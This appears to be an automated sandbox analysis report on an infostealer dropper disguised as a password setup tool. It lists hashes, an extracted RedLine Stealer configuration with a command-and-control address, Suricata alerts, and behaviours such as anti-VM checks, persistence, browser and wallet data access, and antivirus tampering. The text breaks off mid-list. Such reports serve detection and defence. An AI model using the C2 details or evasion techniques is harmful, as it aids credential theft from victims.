Analysis
-
max time kernel
258s -
max time network
259s -
platform
windows10-2004_x64 -
resource
win10v2004-20220715-en -
resource tags
arch:x64arch:x86image:win10v2004-20220715-enlocale:en-usos:windows10-2004-x64system -
submitted
16-07-2022 05:47
Static task
static1
General
-
Target
plc-password-setup-t_rCqyQfiI.exe
-
Size
6.2MB
-
MD5
7250e3da80e7072cea98e23fe4041345
-
SHA1
f9853b72781bc82d6508ac978503ffdfa104b419
-
SHA256
7e1616589594ae5c4303abd3ebf73dbe38b7b3b454690670ddaba11530ab4bd8
-
SHA512
bbf776d9183315a721455dab747c3daf3be1b4ded5d018642c131f9770a9beffdaeaa30fd801100f7ae6086d7417240f6e1171944bb115e7fd86590e8638de63
Malware Config
Extracted
redline
mixbasic1
185.215.113.70:21508
-
auth_value
b5b7790c71797786dfd950545c81e9fa
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4556-382-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
suricata: ET MALWARE AutoHotkey Downloader Checkin via IPLogger
suricata: ET MALWARE AutoHotkey Downloader Checkin via IPLogger
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\is-19OJ6.tmp\ApiTool.dll acprotect C:\Users\Admin\AppData\Local\Temp\is-19OJ6.tmp\ApiTool.dll acprotect -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
WerFault.exeDpEditor.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ DpEditor.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 249 3104 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
DrvInst.exedescription ioc process File created C:\Windows\System32\drivers\SET1F65.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\drivers\SET1F65.tmp DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
is-G18US.tmpAdw.exeAdw.exe905u0rYnoRp85vL3.exesPc0vDiz.exe905u0rYnoRp85vL3.tmpclient.exeWFOiZtxlH5En8g90.exey6OyeWm2.exeis-ROOK1.tmpy6OyeWm2.tmpqnNFsBc8mC239HI4ICw.exensearcher.exeZZBe6j.exevpn.exevpn.tmpAewupLCiG.exeAdblock.execrashpad_handler.exeDnsService.exetapinstall.exeCleaner.exek0b4y.exeDnsService.exeWerFault.exeDnsService.exeDnsService.exeWerFault.exestrongix.exeWerFault.exeWerFault.exeDnsService.exestrongix.exeWerFault.exeDnsService.exetapinstall.exeDnsService.exeDpEditor.exeDnsService.exeDnsService.exeDnsService.exeWerFault.exeDnsService.exeDnsService.exeDnsService.exeWerFault.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exemask_svc.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exepid process 4928 is-G18US.tmp 4264 Adw.exe 4492 Adw.exe 4688 905u0rYnoRp85vL3.exe 1204 sPc0vDiz.exe 4128 905u0rYnoRp85vL3.tmp 1580 client.exe 2960 WFOiZtxlH5En8g90.exe 4648 y6OyeWm2.exe 4828 is-ROOK1.tmp 4032 y6OyeWm2.tmp 2000 qnNFsBc8mC239HI4ICw.exe 4644 nsearcher.exe 4580 ZZBe6j.exe 2080 vpn.exe 1956 vpn.tmp 4384 AewupLCiG.exe 4860 Adblock.exe 4328 crashpad_handler.exe 1096 DnsService.exe 3472 tapinstall.exe 3656 Cleaner.exe 1628 k0b4y.exe 908 DnsService.exe 4788 WerFault.exe 2344 DnsService.exe 4640 DnsService.exe 3924 WerFault.exe 3316 strongix.exe 4128 WerFault.exe 4872 WerFault.exe 4060 DnsService.exe 4556 strongix.exe 3368 WerFault.exe 3684 DnsService.exe 1216 tapinstall.exe 2756 DnsService.exe 3716 DpEditor.exe 4112 DnsService.exe 4680 DnsService.exe 5076 DnsService.exe 4400 WerFault.exe 3148 DnsService.exe 1096 DnsService.exe 4484 DnsService.exe 4732 DnsService.exe 3568 WerFault.exe 3276 DnsService.exe 2240 DnsService.exe 1696 DnsService.exe 4452 DnsService.exe 1244 DnsService.exe 4732 DnsService.exe 3448 mask_svc.exe 700 DnsService.exe 2720 DnsService.exe 4116 DnsService.exe 1696 DnsService.exe 2492 DnsService.exe 2572 DnsService.exe 2248 DnsService.exe 3404 DnsService.exe 4012 DnsService.exe 3524 DnsService.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\is-19OJ6.tmp\ApiTool.dll upx C:\Users\Admin\AppData\Local\Temp\is-19OJ6.tmp\ApiTool.dll upx behavioral1/memory/1956-267-0x0000000009D50000-0x000000000A150000-memory.dmp upx behavioral1/memory/1956-269-0x0000000009D50000-0x000000000A150000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
DpEditor.exerundll32.exeqnNFsBc8mC239HI4ICw.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DpEditor.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DpEditor.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qnNFsBc8mC239HI4ICw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WerFault.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
qnNFsBc8mC239HI4ICw.exevpn.tmpnsearcher.exeAewupLCiG.exeplx0.exeYyVGcMl.exey6OyeWm2.tmpdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Control Panel\International\Geo\Nation qnNFsBc8mC239HI4ICw.exe Key value queried \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Control Panel\International\Geo\Nation vpn.tmp Key value queried \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Control Panel\International\Geo\Nation nsearcher.exe Key value queried \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Control Panel\International\Geo\Nation AewupLCiG.exe Key value queried \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Control Panel\International\Geo\Nation plx0.exe Key value queried \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Control Panel\International\Geo\Nation YyVGcMl.exe Key value queried \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Control Panel\International\Geo\Nation y6OyeWm2.tmp -
Drops startup file 2 IoCs
Processes:
Adblock.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Proxy2Service.lnk File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk Adblock.exe -
Loads dropped DLL 64 IoCs
Processes:
is-G18US.tmpis-ROOK1.tmpy6OyeWm2.tmpvpn.tmpAdblock.exek0b4y.exepid process 4928 is-G18US.tmp 4828 is-ROOK1.tmp 4032 y6OyeWm2.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 4860 Adblock.exe 4860 Adblock.exe 4860 Adblock.exe 4860 Adblock.exe 4860 Adblock.exe 4860 Adblock.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe 1628 k0b4y.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/4788-361-0x0000000000360000-0x0000000000AAE000-memory.dmp themida behavioral1/memory/4788-362-0x0000000000360000-0x0000000000AAE000-memory.dmp themida behavioral1/memory/4788-365-0x0000000000360000-0x0000000000AAE000-memory.dmp themida behavioral1/memory/4788-366-0x0000000000360000-0x0000000000AAE000-memory.dmp themida behavioral1/memory/4788-384-0x0000000000360000-0x0000000000AAE000-memory.dmp themida behavioral1/memory/3716-389-0x00000000004C0000-0x0000000000C0E000-memory.dmp themida behavioral1/memory/3716-400-0x00000000004C0000-0x0000000000C0E000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
msedge.exek0b4y.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\Software\Microsoft\Windows\CurrentVersion\Run k0b4y.exe Set value (str) \REGISTRY\USER\S-1-5-21-2280897447-3291712302-3137480060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\toc = "C:\\Users\\Admin\\AppData\\Roaming\\toc\\plx0.exe" k0b4y.exe -
Checks for any installed AV software in registry 1 TTPs 10 IoCs
Processes:
Adw.exeYyVGcMl.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop Adw.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop Adw.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop YyVGcMl.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira YyVGcMl.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build Adw.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build Adw.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop YyVGcMl.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop YyVGcMl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build = "dtkCZuFdn" YyVGcMl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build Adw.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
DpEditor.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DpEditor.exe -
Drops Chrome extension 2 IoCs
Processes:
YyVGcMl.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\iddmabhekhhonkmomaklnflhhgbfnioe\1.0.0_0\manifest.json YyVGcMl.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json YyVGcMl.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
YyVGcMl.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini YyVGcMl.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 178 api.ipify.org 179 api.ipify.org -
Drops file in System32 directory 48 IoCs
Processes:
svchost.exediEMfCw.exeYyVGcMl.exetapinstall.exeqnNFsBc8mC239HI4ICw.exepowershell.exepowershell.exeDnsService.exedescription ioc process File created C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\SET17A5.tmp svchost.exe File created C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\SET17A6.tmp svchost.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol diEMfCw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_94E7B3470BE03C433A7537248A4381A6 YyVGcMl.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\oemvista.inf svchost.exe File created C:\Windows\System32\DriverStore\drvstore.tmp svchost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_94E7B3470BE03C433A7537248A4381A6 YyVGcMl.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\SET17A7.tmp svchost.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2C34323FD65DA27C8359454F91ED267E YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 YyVGcMl.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\SET17A5.tmp svchost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_B33C53C21730FCB46E04046BC9545FF3 YyVGcMl.exe File created C:\Windows\system32\GroupPolicy\gpt.ini qnNFsBc8mC239HI4ICw.exe File created C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\SET17A7.tmp svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini diEMfCw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 YyVGcMl.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_FA27C69BD958FCD11B7FC65A9669C43E YyVGcMl.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\tap0901.cat svchost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b} svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2C34323FD65DA27C8359454F91ED267E YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_B33C53C21730FCB46E04046BC9545FF3 YyVGcMl.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA YyVGcMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_FA27C69BD958FCD11B7FC65A9669C43E YyVGcMl.exe File created C:\Windows\System32\userDns.conf DnsService.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\SET17A6.tmp svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{30940480-cbce-2f45-9c6b-fef35cc9bd2b}\tap0901.sys svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
AewupLCiG.exeWerFault.exeDpEditor.exemask_svc.exeDnsService.exemask_svc.exepid process 4384 AewupLCiG.exe 4384 AewupLCiG.exe 4788 WerFault.exe 3716 DpEditor.exe 3448 mask_svc.exe 3404 DnsService.exe 3968 mask_svc.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
strongix.exedescription pid process target process PID 3316 set thread context of 4556 3316 strongix.exe strongix.exe -
Drops file in Program Files directory 64 IoCs
Processes:
vpn.tmpis-ROOK1.tmp905u0rYnoRp85vL3.tmpYyVGcMl.exesetup.exeis-G18US.tmpclient.exesPc0vDiz.exeMaskVPNUpdate.exedescription ioc process File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-V1HBS.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-5G8Q7.tmp vpn.tmp File created C:\Program Files (x86)\agSearcher\is-TDB3T.tmp is-ROOK1.tmp File created C:\Program Files (x86)\Proxy2Service\unins000.dat 905u0rYnoRp85vL3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-1HBBC.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-OLH12.tmp vpn.tmp File created C:\Program Files (x86)\agSearcher\is-1KK9D.tmp is-ROOK1.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-66C9O.tmp vpn.tmp File created C:\Program Files (x86)\agSearcher\unins000.dat is-ROOK1.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja YyVGcMl.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\6d415cba-384a-44d4-80f4-7ed5d1c20e16.tmp setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-0K5V3.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-G537Q.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe is-G18US.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-O14RN.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-L9F02.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-E5594.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-7AHB6.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File created C:\Program Files (x86)\agSearcher\is-JVNKT.tmp is-ROOK1.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-2FMLL.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak YyVGcMl.exe File created C:\Program Files (x86)\hoTBfSJVSoUn\SPCnqLF.dll YyVGcMl.exe File opened for modification C:\Program Files (x86)\Proxy2Service\p2pminimal.log client.exe File created C:\Program Files (x86)\agSearcher\is-538SL.tmp is-ROOK1.tmp File created C:\Program Files (x86)\MaskVPN\is-8LRSV.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-0S5K0.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-IN6C8.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-P8UNV.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-NJM4M.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Proxy2Service\unins000.dat File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File created C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\unins000.dat is-G18US.tmp File created C:\Program Files (x86)\agSearcher\is-34F5M.tmp is-ROOK1.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-U8AI8.tmp vpn.tmp File created C:\Program Files (x86)\jSTUIzYTU\NuLsnIa.xml YyVGcMl.exe File opened for modification C:\Program Files (x86)\agSearcher\nsearcher.exe is-ROOK1.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-QMUOI.tmp vpn.tmp File created C:\Program Files (x86)\hjrwynviHbgqC\IdMJTlY.xml YyVGcMl.exe File created C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\is-PTC46.tmp is-G18US.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja sPc0vDiz.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-5S7RT.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\version MaskVPNUpdate.exe File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-2NN10.tmp vpn.tmp File created C:\Program Files (x86)\agSearcher\is-6HJHC.tmp is-ROOK1.tmp File created C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\is-QLG2Q.tmp is-G18US.tmp File created C:\Program Files (x86)\MaskVPN\is-P79IO.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-E5NHJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-3ELSO.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-JN11E.tmp vpn.tmp File created C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\is-AEVAA.tmp is-G18US.tmp File opened for modification C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\unins000.dat is-G18US.tmp File created C:\Program Files\Mozilla Firefox\browser\features\{A5735E22-7BD8-4CED-A24E-FBBD2D9CABB9}.xpi YyVGcMl.exe File opened for modification C:\Program Files (x86)\agSearcher\unins000.dat is-ROOK1.tmp -
Drops file in Windows directory 10 IoCs
Processes:
svchost.exeDrvInst.exeschtasks.exeschtasks.exeschtasks.exetapinstall.exesvchost.exeschtasks.exedescription ioc process File opened for modification C:\Windows\inf\oem2.inf svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Tasks\CIcUyKJLAVuuAuH.job schtasks.exe File created C:\Windows\Tasks\TRumkXcEfDHvRQPKg.job schtasks.exe File created C:\Windows\Tasks\bjuwDiWYYxyfpXHSNP.job schtasks.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\inf\oem2.inf svchost.exe File created C:\Windows\Tasks\QQVQlcLfPfwBrvcRm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3188 4264 WerFault.exe Adw.exe 3580 4264 WerFault.exe Adw.exe 2432 4264 WerFault.exe Adw.exe 3480 4264 WerFault.exe Adw.exe 1076 4492 WerFault.exe Adw.exe 4192 4492 WerFault.exe Adw.exe 2508 4492 WerFault.exe Adw.exe 1248 4492 WerFault.exe Adw.exe 3476 4492 WerFault.exe Adw.exe 2364 4492 WerFault.exe Adw.exe 4240 4492 WerFault.exe Adw.exe 2404 4492 WerFault.exe Adw.exe 4332 4492 WerFault.exe Adw.exe 3420 4492 WerFault.exe Adw.exe 4760 4492 WerFault.exe Adw.exe 2880 4492 WerFault.exe Adw.exe 1268 4492 WerFault.exe Adw.exe 1840 4492 WerFault.exe Adw.exe 4556 4492 WerFault.exe Adw.exe 1336 4492 WerFault.exe Adw.exe 3404 4492 WerFault.exe Adw.exe 2892 4492 WerFault.exe Adw.exe 4432 4492 WerFault.exe Adw.exe 4584 